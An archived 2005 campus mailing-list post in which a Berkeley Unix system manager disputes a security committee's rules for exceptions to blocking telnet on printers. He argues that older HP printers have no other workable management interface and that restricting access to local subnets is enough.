On Fri, May 06, 2005 at 04:36:21PM -0700, Craig Lant wrote:
>
> Just to clarify, the CISC will grant exceptions for open telnet ports on
> printers only if there is no way to turn off the telnet port, a
> reasonable password is set, and the telnet port is rarely, if ever,
> used. However, we still need people to submit requests for exception so
> that SNS has the IP addresses involved and so that we can track these
> exceptions. They are not indefinite exceptions, they are, at most, for
> one year.
I think that this stance is unreasonable, for two reasons. First, the
sudden change to aggressive blocking has taken people by surprise.
(For almost two years we were told that SNS didn't intend to block
devices unless they actually generated a problem. Now it seems that
anything that violates the policy will be blocked.) The three criteria
for granting an exception appear to be pretty arbitrary. This puts
those of us who generally support enforcement of minimum standards
in a difficult position.
Second, there are some printers for which telnet is the only
reasonable management interface. More recent HP models have SSL
enabled web interfaces, but older ones don't support any standard
access method except telnet. (Please don't suggest that we install
MS Windows to run proprietary software for managing printers.)
All of the printers that I know of running telnet allow access to be
restricted to a small set of machines, and that seems sufficient to
mitigate the technical violation of the security standards.
Now, it's possible that there is a way to manage HP printers from a
Mac, or another unix box, but I've asked many people, and nobody
has suggested a way. If anyone knows how, I'd be delighted to adopt it
and turn off telnet altogether.
We have known for a while that telnet on printers technically violates
the standards, but since we restrict access to our local subnets,
and don't have any good management alternative, we figured that they
would be OK as is, until they eventually break and get replaced by
modern devices - this might take more than one year. If necessary, we
could probably restrict telnet access to a very small number of
machines, but turning it off altogether presents a problem. I fully
understand that a cracker could break into one of the hosts on our
subnet, set up a sniffer and wait till someone telnets to a printer,
and then use that password to compromise the printer; having done
so, they could do bad things. Realistically, this seems very low
in probability compared to attacks directed at Windows vulnerabilities,
and other easy targets.
Oh, by the way, it's kind of humorous that you are asking people to
submit exception requests for violations that SNS scanning can't
detect. Good luck in getting the community to cooperate on that!
Steve
--
Steve Sizemore <steve (at) ls.berkeley.edu>, (510) 642-8570
Unix System Manager
Dept. of Mathematics and College of Letters and Science
University of California, Berkeley
------------------------------------------------------------------------
The following was automatically added to this message by the list server:
For information about Micronet, including subscribing to
or unsubscribing from its mailing list and finding out
about upcoming meetings, please visit the Micronet Web site:
<http://micronet.berkeley.edu/>.
This archive was generated by hypermail 2.1.8 : Fri May 06 2005 - 20:59:49 PDT